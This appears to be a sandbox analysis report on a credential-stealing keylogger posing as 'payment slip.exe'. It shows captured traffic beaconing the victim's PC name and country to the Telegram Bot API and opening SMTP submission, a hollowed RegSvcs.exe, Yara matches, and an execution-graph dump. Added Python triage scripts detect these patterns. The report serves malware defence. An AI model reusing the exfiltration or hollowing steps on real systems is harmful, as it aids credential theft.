vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5623
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5A8tUIlh0U4lHJjQHxvf3uN2c661j5dknk1%2FefJAgGHDW5aYd3Z0nNqNw46QM2vsI9ywVtnW5T%2Fczqu13JocRo%2B0ry%2FWfa3K%2FaAGKVXMoa0tVSfjRRzT1O%2FUz4CM6rAwNBm3CBCe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb6972ed78c3f-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:45 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:45 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49721 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:46 UTC | 349 | OUT |
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-07-31 07:00:46 UTC | 344 | IN |
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 31 Jul 2024 07:00:46 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-31 07:00:46 UTC | 55 | IN | (decoded JSON body)
{"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jul 31, 2024 09:00:53.700608015 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7 |
220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 31 Jul 2024 12:30:53 +0530
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Jul 31, 2024 09:00:53.700831890 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115 |
EHLO 536720
Jul 31, 2024 09:00:53.857491970 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7 |
250-bh-13.webhostbox.net Hello 536720 [8.46.123.33]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Jul 31, 2024 09:00:53.857744932 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115 |
STARTTLS
Jul 31, 2024 09:00:54.015309095 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7 |
220 TLS go ahead
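The three network behaviours above belong together: RegSvcs.exe (PID 1104) resolves its public IP and country through reallyfreegeoip.org, beacons that country plus the PC name to the Telegram Bot API, and opens an SMTP submission (port 587, EHLO with the same PC name, STARTTLS) to webhostbox.net. The Telegram request goes to /bot/sendMessage with no bot token and an empty chat_id, which is why api.telegram.org answers 404. The script below is an added triage example for this page, not Joe Sandbox code; it parses the beacon, tolerates the truncated geo-IP body, and correlates the EHLO name with the exfiltrated PC name. The sample events, the browser allow-list and the single geo-IP host are constructed from what this report shows and are assumptions for any other environment.

```python
"""Triage of the exfiltration pattern in this report: a geo-IP lookup, a
Telegram Bot API beacon and an SMTP submission, all from RegSvcs.exe (PID 1104).
Added example for this page, not Joe Sandbox code; sample inputs are constructed
from the requests the report shows."""
from __future__ import annotations
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

GEOIP_HOSTS = {"reallyfreegeoip.org"}          # the IP-check service seen in this report
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumed benign callers


@dataclass
class HttpEvent:
    pid: int
    process: str            # image path as the report prints it
    url: str                # scheme://host/path?query
    status: int | None = None


def parse_telegram_beacon(url: str) -> dict | None:
    """Decode a Telegram sendMessage beacon into token, chat_id and the
    'Key: value' lines of its text; returns None for any other URL."""
    parts = urlsplit(url)
    m = re.fullmatch(r"/bot([^/]*)/sendMessage", parts.path)
    if parts.hostname != "api.telegram.org" or not m:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    text = q.get("text", [""])[0]
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {"token": m.group(1), "chat_id": q.get("chat_id", [""])[0],
            "text": text, "fields": fields}


def extract_geoip_fields(body: str) -> dict:
    """Collect complete <Tag>value</Tag> pairs from a chunked, possibly truncated
    reallyfreegeoip.org XML body (the report's capture stops inside <Latitude>)."""
    body = re.sub(r"^[0-9a-fA-F]+\r\n", "", body)       # drop the chunk-size line
    return {tag: value for tag, value in re.findall(r"<(\w+)>([^<]*)</\1>", body)}


def smtp_ehlo_name(command: str) -> str | None:
    """Hostname the client announced in EHLO/HELO, if the line is one."""
    m = re.match(r"^(?:EHLO|HELO)\s+(\S+)", command)
    return m.group(1) if m else None


def triage(events: list[HttpEvent], smtp_commands: list[str]) -> list[str]:
    """Findings as strings. A geo-IP lookup followed by a Telegram beacon from the
    same non-browser PID is the strong signal; a blank token/chat_id explains the 404."""
    findings, geoip_pids, pc_names = [], set(), set()
    for ev in events:
        exe = ev.process.rsplit("\\", 1)[-1].lower()
        host = urlsplit(ev.url).hostname
        if host in GEOIP_HOSTS and exe not in BROWSERS:
            geoip_pids.add(ev.pid)
            findings.append(f"geoip_lookup pid={ev.pid} exe={exe} host={host}")
        beacon = parse_telegram_beacon(ev.url)
        if beacon is None:
            continue
        pc = beacon["fields"].get("PC Name", "")
        findings.append(f"telegram_beacon pid={ev.pid} exe={exe} pc={pc} status={ev.status}")
        if not beacon["token"] or not beacon["chat_id"]:
            findings.append("telegram_config_empty (blank bot token or chat_id; "
                            "api.telegram.org answers 404)")
        if ev.pid in geoip_pids:
            findings.append(f"geoip_then_telegram pid={ev.pid}")
        if pc:
            pc_names.add(pc)
    for cmd in smtp_commands:
        name = smtp_ehlo_name(cmd)
        if name in pc_names:
            findings.append(f"smtp_ehlo_matches_pc_name name={name}")
    return findings


# Constructed from the report's sessions 2 and 9 and the SMTP exchange above.
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
TELEGRAM_URL = ("https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0A"
                "PC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57"
                "%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked"
                "%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the"
                "%20system%20storage's%20empty.%20%5D")
GEOIP_BODY = ("14d\r\n<Response>\n\t<IP>8.46.123.33</IP>\n\t<CountryCode>US</CountryCode>\n\t"
              "<CountryName>United States</CountryName>\n\t<RegionCode></RegionCode>\n\t"
              "<RegionName></RegionName>\n\t<City></City>\n\t<ZipCode></ZipCode>\n\t"
              "<TimeZone>America/Chicago</TimeZone>\n\t<Latitude>37.75")
SAMPLE_EVENTS = [
    HttpEvent(1104, REGSVCS, "https://reallyfreegeoip.org/xml/8.46.123.33", 200),
    HttpEvent(1104, REGSVCS, TELEGRAM_URL, 404),
]
SAMPLE_SMTP = ["EHLO 536720", "STARTTLS"]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, SAMPLE_SMTP):
        print(finding)
    print(extract_geoip_fields(GEOIP_BODY))
```

Run it as-is to see the five findings for this sample; in a real pipeline feed it the proxy or TLS-inspection log for the PID and the SMTP client commands from the same host. The regex-based XML extraction is deliberate: the captured body ends mid-element, so a strict parser would reject it and lose the country fields that were actually transferred.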


                                      Target ID:0
                                      Start time:03:00:26
                                      Start date:31/07/2024
                                      Path:C:\Users\user\Desktop\payment slip.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\payment slip.exe"
                                      Imagebase:0x30000
                                      File size:1'065'472 bytes
                                      MD5 hash:0CAC6A293391FDB0F89189A89DC47150
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:03:00:27
                                      Start date:31/07/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\payment slip.exe"
                                      Imagebase:0x1b0000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false
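The two process records above carry the tell-tale of hollowing: Target ID 2 is the .NET utility RegSvcs.exe on disk, yet its command line is the sample's own ("C:\Users\user\Desktop\payment slip.exe"), and it is the process that holds the Snake Keylogger Yara matches and all the network sessions. The check below is an added example for this page, not Joe Sandbox code; it compares each process's image with the executable named in its command line and raises the severity when the image is a known hollowing host. The two records are constructed from the Target ID 0 and 2 blocks; the host list beyond RegSvcs.exe is an assumption from general triage experience, not data from this report.

```python
"""Image/command-line mismatch check for the process list in this report: the
RegSvcs.exe child (Target ID 2) runs with the sample's own command line, which is
what a hollowed host looks like. Added example for this page, not Joe Sandbox
code; the records are constructed from the Target ID 0 and 2 blocks."""
from __future__ import annotations
import re
from dataclasses import dataclass

# .NET utilities commonly abused as hollowing hosts. RegSvcs.exe is the one this
# report shows; the others are an assumption from general triage experience.
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe",
                "aspnet_compiler.exe"}


@dataclass
class ProcessRecord:
    target_id: int
    path: str            # "Path:" line of the report
    command_line: str    # "Commandline:" line of the report


def command_line_image(command_line: str) -> str:
    """First token of the command line, honouring a double-quoted path."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', command_line)
    return (m.group(1) or m.group(2) or "") if m else ""


def basename(path: str) -> str:
    """Case-folded file name, accepting either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def image_mismatch(rec: ProcessRecord) -> bool:
    """True when the executable on disk and the one named in the command line
    differ. Compared by basename so a bare 'notepad.exe' launch is not flagged;
    a relative name without extension would still need path normalisation."""
    return basename(command_line_image(rec.command_line)) != basename(rec.path)


def triage_processes(records: list[ProcessRecord]) -> list[str]:
    """One finding per mismatching record; known hollowing hosts are 'high'."""
    findings = []
    for rec in records:
        if not image_mismatch(rec):
            continue
        image = basename(rec.path)
        severity = "high" if image in HOLLOW_HOSTS else "medium"
        findings.append(f"image_cmdline_mismatch target={rec.target_id} image={image} "
                        f"cmdline_image={basename(command_line_image(rec.command_line))} "
                        f"severity={severity}")
    return findings


# Constructed from the Target ID 0 and Target ID 2 blocks of this report.
SAMPLE_RECORDS = [
    ProcessRecord(0, r"C:\Users\user\Desktop\payment slip.exe",
                  r'"C:\Users\user\Desktop\payment slip.exe"'),
    ProcessRecord(2, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
                  r'"C:\Users\user\Desktop\payment slip.exe"'),
]

if __name__ == "__main__":
    for finding in triage_processes(SAMPLE_RECORDS):
        print(finding)
```

On Sysmon or EDR data the same comparison runs over Image and CommandLine of each process-creation event; the parent being a user-writable executable (here the AutoIt-compiled sample on the Desktop) spawning a Windows .NET utility with a foreign command line is the pairing to alert on.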


                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0.9%
                                        Signature Coverage:2.8%
                                        Total number of Nodes:1974
                                        Total number of Limit Nodes:52
execution_graph (the node and edge dump of the 1974 nodes is not reproduced as text; the API calls named in it are listed below)

Nodes 0x3b00000 to 0x3b034ca, a region outside the main image (Imagebase 0x30000, 1'065'472 bytes), entered at 0x3b023b0 and traversed in this order: GetPEB, Sleep, CreateFileW, VirtualAlloc, ReadFile, a node at 0x3b012a0 summarised as "13 API calls", ExitProcess.

Nodes in the main image, starting at 0x32de3: GetOpenFileNameW, GetFullPathNameW, GetLongPathNameW, RaiseException, RtlAllocateHeap, LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, CreateStreamOnHGlobal, together with CRT routines (__wsopen_s, ___scrt_fastfail, __fread_nolock, _wcslen, ___std_exception_copy, __dosmaperr, _strftime, ___DestructExceptionObject) and further nodes summarised only as "N API calls". The dump is cut off at this point in the report.
97142 5e5d4 LeaveCriticalSection __fread_nolock 97126->97142 97127 5e554 __wsopen_s 97127->97082 97131 6806d ___DestructExceptionObject 97130->97131 97143 62f5e EnterCriticalSection 97131->97143 97133 6807b 97144 680fb 97133->97144 97137 680ac __wsopen_s 97137->97124 97138->97117 97139->97127 97140->97127 97141->97127 97142->97127 97143->97133 97145 6811e 97144->97145 97146 68177 97145->97146 97153 68088 97145->97153 97160 5918d EnterCriticalSection 97145->97160 97161 591a1 LeaveCriticalSection 97145->97161 97162 64c7d 97146->97162 97151 68189 97151->97153 97175 63405 11 API calls 2 library calls 97151->97175 97157 680b7 97153->97157 97154 681a8 97176 5918d EnterCriticalSection 97154->97176 97180 62fa6 LeaveCriticalSection 97157->97180 97159 680be 97159->97137 97160->97145 97161->97145 97168 64c8a __dosmaperr 97162->97168 97163 64cca 97178 5f2d9 20 API calls __dosmaperr 97163->97178 97164 64cb5 RtlAllocateHeap 97166 64cc8 97164->97166 97164->97168 97169 629c8 97166->97169 97168->97163 97168->97164 97177 54ead 7 API calls 2 library calls 97168->97177 97170 629d3 RtlFreeHeap 97169->97170 97171 629fc _free 97169->97171 97170->97171 97172 629e8 97170->97172 97171->97151 97179 5f2d9 20 API calls __dosmaperr 97172->97179 97174 629ee GetLastError 97174->97171 97175->97154 97176->97153 97177->97168 97178->97166 97179->97174 97180->97159 97182 4fddb 22 API calls 97181->97182 97183 35734 97182->97183 97183->97092 97185 342bc FindResourceExW 97184->97185 97189 342d9 97184->97189 97186 735ba LoadResource 97185->97186 97185->97189 97187 735cf SizeofResource 97186->97187 97186->97189 97188 735e3 LockResource 97187->97188 97187->97189 97188->97189 97189->97104 97191 73d90 97190->97191 97192 3512e 97190->97192 97196 5ece3 97192->97196 97195->97097 97199 5eaaa 97196->97199 97198 3513c 97198->97104 97202 5eab6 ___DestructExceptionObject 97199->97202 97200 5eac2 97212 5f2d9 20 API calls __dosmaperr 97200->97212 97202->97200 97203 5eae8 97202->97203 97214 5918d EnterCriticalSection 
97203->97214 97205 5eac7 97213 627ec 26 API calls _strftime 97205->97213 97206 5eaf4 97215 5ec0a 62 API calls 2 library calls 97206->97215 97209 5eb08 97216 5eb27 LeaveCriticalSection __fread_nolock 97209->97216 97211 5ead2 __wsopen_s 97211->97198 97212->97205 97213->97211 97214->97206 97215->97209 97216->97211 97220 5e8e1 97217->97220 97219 35118 97219->97110 97221 5e8ed ___DestructExceptionObject 97220->97221 97222 5e900 ___scrt_fastfail 97221->97222 97223 5e92d 97221->97223 97224 5e925 __wsopen_s 97221->97224 97247 5f2d9 20 API calls __dosmaperr 97222->97247 97233 5918d EnterCriticalSection 97223->97233 97224->97219 97226 5e937 97234 5e6f8 97226->97234 97229 5e91a 97248 627ec 26 API calls _strftime 97229->97248 97233->97226 97235 5e70a ___scrt_fastfail 97234->97235 97239 5e727 97234->97239 97236 5e717 97235->97236 97235->97239 97244 5e76a __fread_nolock 97235->97244 97322 5f2d9 20 API calls __dosmaperr 97236->97322 97249 5e96c LeaveCriticalSection __fread_nolock 97239->97249 97240 5e886 ___scrt_fastfail 97325 5f2d9 20 API calls __dosmaperr 97240->97325 97244->97239 97244->97240 97250 5d955 97244->97250 97257 68d45 97244->97257 97324 5cf78 26 API calls 4 library calls 97244->97324 97245 5e71c 97323 627ec 26 API calls _strftime 97245->97323 97247->97229 97248->97224 97249->97224 97251 5d976 97250->97251 97252 5d961 97250->97252 97251->97244 97326 5f2d9 20 API calls __dosmaperr 97252->97326 97254 5d966 97327 627ec 26 API calls _strftime 97254->97327 97256 5d971 97256->97244 97258 68d57 97257->97258 97259 68d6f 97257->97259 97337 5f2c6 20 API calls __dosmaperr 97258->97337 97261 690d9 97259->97261 97270 68db4 97259->97270 97353 5f2c6 20 API calls __dosmaperr 97261->97353 97262 68d5c 97338 5f2d9 20 API calls __dosmaperr 97262->97338 97265 690de 97354 5f2d9 20 API calls __dosmaperr 97265->97354 97267 68dbf 97339 5f2c6 20 API calls __dosmaperr 97267->97339 97268 68dcc 97355 627ec 26 API calls _strftime 97268->97355 97270->97267 97271 68d64 97270->97271 97274 68def 
97270->97274 97271->97244 97272 68dc4 97340 5f2d9 20 API calls __dosmaperr 97272->97340 97276 68e08 97274->97276 97277 68e2e 97274->97277 97278 68e4a 97274->97278 97276->97277 97282 68e15 97276->97282 97341 5f2c6 20 API calls __dosmaperr 97277->97341 97344 63820 21 API calls 2 library calls 97278->97344 97281 68e33 97342 5f2d9 20 API calls __dosmaperr 97281->97342 97328 6f89b 97282->97328 97283 68e61 97286 629c8 _free 20 API calls 97283->97286 97289 68e6a 97286->97289 97287 68fb3 97290 69029 97287->97290 97292 68fcc GetConsoleMode 97287->97292 97288 68e3a 97343 627ec 26 API calls _strftime 97288->97343 97293 629c8 _free 20 API calls 97289->97293 97294 6902d ReadFile 97290->97294 97292->97290 97295 68fdd 97292->97295 97296 68e71 97293->97296 97297 69047 97294->97297 97298 690a1 GetLastError 97294->97298 97295->97294 97299 68fe3 ReadConsoleW 97295->97299 97300 68e96 97296->97300 97301 68e7b 97296->97301 97297->97298 97304 6901e 97297->97304 97302 69005 97298->97302 97303 690ae 97298->97303 97299->97304 97306 68fff GetLastError 97299->97306 97347 69424 28 API calls __wsopen_s 97300->97347 97345 5f2d9 20 API calls __dosmaperr 97301->97345 97319 68e45 __fread_nolock 97302->97319 97348 5f2a3 20 API calls 2 library calls 97302->97348 97351 5f2d9 20 API calls __dosmaperr 97303->97351 97314 69083 97304->97314 97315 6906c 97304->97315 97304->97319 97306->97302 97307 629c8 _free 20 API calls 97307->97271 97310 690b3 97352 5f2c6 20 API calls __dosmaperr 97310->97352 97312 68e80 97346 5f2c6 20 API calls __dosmaperr 97312->97346 97318 6909a 97314->97318 97314->97319 97349 68a61 31 API calls 4 library calls 97315->97349 97350 688a1 29 API calls __wsopen_s 97318->97350 97319->97307 97321 6909f 97321->97319 97322->97245 97323->97239 97324->97244 97325->97245 97326->97254 97327->97256 97329 6f8b5 97328->97329 97330 6f8a8 97328->97330 97334 6f8c1 97329->97334 97357 5f2d9 20 API calls __dosmaperr 97329->97357 97356 5f2d9 20 API calls __dosmaperr 97330->97356 97333 6f8ad 97333->97287 
97334->97287 97335 6f8e2 97358 627ec 26 API calls _strftime 97335->97358 97337->97262 97338->97271 97339->97272 97340->97268 97341->97281 97342->97288 97343->97319 97344->97283 97345->97312 97346->97319 97347->97282 97348->97319 97349->97319 97350->97321 97351->97310 97352->97319 97353->97265 97354->97268 97355->97271 97356->97333 97357->97335 97358->97333 97362 5e4e8 97359->97362 97361 a275d 97361->97112 97365 5e469 97362->97365 97364 5e505 97364->97361 97366 5e478 97365->97366 97368 5e48c 97365->97368 97373 5f2d9 20 API calls __dosmaperr 97366->97373 97372 5e488 __alldvrm 97368->97372 97375 6333f 11 API calls 2 library calls 97368->97375 97369 5e47d 97374 627ec 26 API calls _strftime 97369->97374 97372->97364 97373->97369 97374->97372 97375->97372 97381 a2e7a 97376->97381 97377 350f5 40 API calls 97377->97381 97378 a2d3b 97378->97041 97378->97058 97379 a28fe 27 API calls 97379->97381 97380 3511f 64 API calls 97380->97381 97381->97377 97381->97378 97381->97379 97381->97380 97383 a22e7 97382->97383 97384 a22d9 97382->97384 97386 a232c 97383->97386 97387 5e5eb 29 API calls 97383->97387 97398 a22f0 97383->97398 97385 5e5eb 29 API calls 97384->97385 97385->97383 97411 a2557 97386->97411 97389 a2311 97387->97389 97389->97386 97391 a231a 97389->97391 97390 a2370 97392 a2374 97390->97392 97393 a2395 97390->97393 97395 5e678 67 API calls 97391->97395 97391->97398 97394 a2381 97392->97394 97397 5e678 67 API calls 97392->97397 97415 a2171 97393->97415 97394->97398 97402 5e678 67 API calls 97394->97402 97395->97398 97397->97394 97398->97058 97399 a239d 97400 a23c3 97399->97400 97401 a23a3 97399->97401 97422 a23f3 97400->97422 97403 a23b0 97401->97403 97405 5e678 67 API calls 97401->97405 97402->97398 97403->97398 97406 5e678 67 API calls 97403->97406 97405->97403 97406->97398 97407 a23ca 97408 a23de 97407->97408 97430 5e678 97407->97430 97408->97398 97410 5e678 67 API calls 97408->97410 97410->97398 97412 a257c 97411->97412 97414 a2565 __fread_nolock 97411->97414 97413 5e8c4 
__fread_nolock 40 API calls 97412->97413 97413->97414 97414->97390 97416 5ea0c ___std_exception_copy 21 API calls 97415->97416 97417 a217f 97416->97417 97418 5ea0c ___std_exception_copy 21 API calls 97417->97418 97419 a2190 97418->97419 97420 5ea0c ___std_exception_copy 21 API calls 97419->97420 97421 a219c 97420->97421 97421->97399 97429 a2408 97422->97429 97423 a24c0 97447 a2724 97423->97447 97425 a24c7 97425->97407 97426 a21cc 40 API calls 97426->97429 97429->97423 97429->97425 97429->97426 97443 a2606 97429->97443 97451 a2269 40 API calls 97429->97451 97431 5e684 ___DestructExceptionObject 97430->97431 97432 5e695 97431->97432 97433 5e6aa 97431->97433 97504 5f2d9 20 API calls __dosmaperr 97432->97504 97442 5e6a5 __wsopen_s 97433->97442 97487 5918d EnterCriticalSection 97433->97487 97435 5e69a 97505 627ec 26 API calls _strftime 97435->97505 97438 5e6c6 97488 5e602 97438->97488 97440 5e6d1 97506 5e6ee LeaveCriticalSection __fread_nolock 97440->97506 97442->97408 97444 a261d 97443->97444 97446 a2617 97443->97446 97444->97429 97446->97444 97452 a26d7 97446->97452 97448 a2742 97447->97448 97449 a2731 97447->97449 97448->97425 97450 5dbb3 65 API calls 97449->97450 97450->97448 97451->97429 97453 a2703 97452->97453 97455 a2714 97452->97455 97456 5dbb3 97453->97456 97455->97446 97457 5dbdd 97456->97457 97458 5dbc1 97456->97458 97457->97455 97458->97457 97459 5dbe3 97458->97459 97460 5dbcd 97458->97460 97465 5d9cc 97459->97465 97468 5f2d9 20 API calls __dosmaperr 97460->97468 97463 5dbd2 97469 627ec 26 API calls _strftime 97463->97469 97470 5d97b 97465->97470 97467 5d9f0 97467->97457 97468->97463 97469->97457 97471 5d987 ___DestructExceptionObject 97470->97471 97478 5918d EnterCriticalSection 97471->97478 97473 5d995 97479 5d9f4 97473->97479 97477 5d9b3 __wsopen_s 97477->97467 97478->97473 97480 649a1 27 API calls 97479->97480 97481 5da09 97480->97481 97482 5da3a 62 API calls 97481->97482 97483 5da24 97482->97483 97484 64a56 62 API calls 97483->97484 97485 5d9a2 
97484->97485 97486 5d9c0 LeaveCriticalSection __fread_nolock 97485->97486 97486->97477 97487->97438 97489 5e624 97488->97489 97490 5e60f 97488->97490 97497 5e61f 97489->97497 97507 5dc0b 97489->97507 97532 5f2d9 20 API calls __dosmaperr 97490->97532 97492 5e614 97533 627ec 26 API calls _strftime 97492->97533 97497->97440 97499 5d955 __fread_nolock 26 API calls 97500 5e646 97499->97500 97517 6862f 97500->97517 97503 629c8 _free 20 API calls 97503->97497 97504->97435 97505->97442 97506->97442 97508 5dc23 97507->97508 97509 5dc1f 97507->97509 97508->97509 97510 5d955 __fread_nolock 26 API calls 97508->97510 97513 64d7a 97509->97513 97511 5dc43 97510->97511 97534 659be 97511->97534 97514 5e640 97513->97514 97515 64d90 97513->97515 97514->97499 97515->97514 97516 629c8 _free 20 API calls 97515->97516 97516->97514 97518 6863e 97517->97518 97519 68653 97517->97519 97657 5f2c6 20 API calls __dosmaperr 97518->97657 97520 6868e 97519->97520 97524 6867a 97519->97524 97659 5f2c6 20 API calls __dosmaperr 97520->97659 97523 68643 97658 5f2d9 20 API calls __dosmaperr 97523->97658 97654 68607 97524->97654 97525 68693 97660 5f2d9 20 API calls __dosmaperr 97525->97660 97529 5e64c 97529->97497 97529->97503 97530 6869b 97661 627ec 26 API calls _strftime 97530->97661 97532->97492 97533->97497 97535 659ca ___DestructExceptionObject 97534->97535 97536 659d2 97535->97536 97537 659ea 97535->97537 97613 5f2c6 20 API calls __dosmaperr 97536->97613 97539 65a88 97537->97539 97543 65a1f 97537->97543 97618 5f2c6 20 API calls __dosmaperr 97539->97618 97540 659d7 97614 5f2d9 20 API calls __dosmaperr 97540->97614 97559 65147 EnterCriticalSection 97543->97559 97544 65a8d 97619 5f2d9 20 API calls __dosmaperr 97544->97619 97545 659df __wsopen_s 97545->97509 97548 65a25 97550 65a56 97548->97550 97551 65a41 97548->97551 97549 65a95 97620 627ec 26 API calls _strftime 97549->97620 97560 65aa9 97550->97560 97615 5f2d9 20 API calls __dosmaperr 97551->97615 97555 65a51 97617 65a80 LeaveCriticalSection 
__wsopen_s 97555->97617 97556 65a46 97616 5f2c6 20 API calls __dosmaperr 97556->97616 97559->97548 97561 65ad7 97560->97561 97598 65ad0 97560->97598 97562 65afa 97561->97562 97563 65adb 97561->97563 97567 65b4b 97562->97567 97568 65b2e 97562->97568 97628 5f2c6 20 API calls __dosmaperr 97563->97628 97566 65ae0 97629 5f2d9 20 API calls __dosmaperr 97566->97629 97571 65b61 97567->97571 97634 69424 28 API calls __wsopen_s 97567->97634 97631 5f2c6 20 API calls __dosmaperr 97568->97631 97569 65cb1 97569->97555 97621 6564e 97571->97621 97573 65ae7 97630 627ec 26 API calls _strftime 97573->97630 97576 65b33 97632 5f2d9 20 API calls __dosmaperr 97576->97632 97580 65b6f 97585 65b95 97580->97585 97586 65b73 97580->97586 97581 65ba8 97583 65c02 WriteFile 97581->97583 97584 65bbc 97581->97584 97582 65b3b 97633 627ec 26 API calls _strftime 97582->97633 97588 65c25 GetLastError 97583->97588 97593 65b8b 97583->97593 97590 65bc4 97584->97590 97591 65bf2 97584->97591 97636 6542e 45 API calls 3 library calls 97585->97636 97592 65c69 97586->97592 97635 655e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97586->97635 97588->97593 97594 65be2 97590->97594 97595 65bc9 97590->97595 97639 656c4 7 API calls 2 library calls 97591->97639 97592->97598 97643 5f2d9 20 API calls __dosmaperr 97592->97643 97593->97592 97593->97598 97604 65c45 97593->97604 97638 65891 8 API calls 2 library calls 97594->97638 97595->97592 97600 65bd2 97595->97600 97645 50a8c 97598->97645 97637 657a3 7 API calls 2 library calls 97600->97637 97602 65be0 97602->97593 97603 65c8e 97644 5f2c6 20 API calls __dosmaperr 97603->97644 97607 65c60 97604->97607 97608 65c4c 97604->97608 97642 5f2a3 20 API calls 2 library calls 97607->97642 97640 5f2d9 20 API calls __dosmaperr 97608->97640 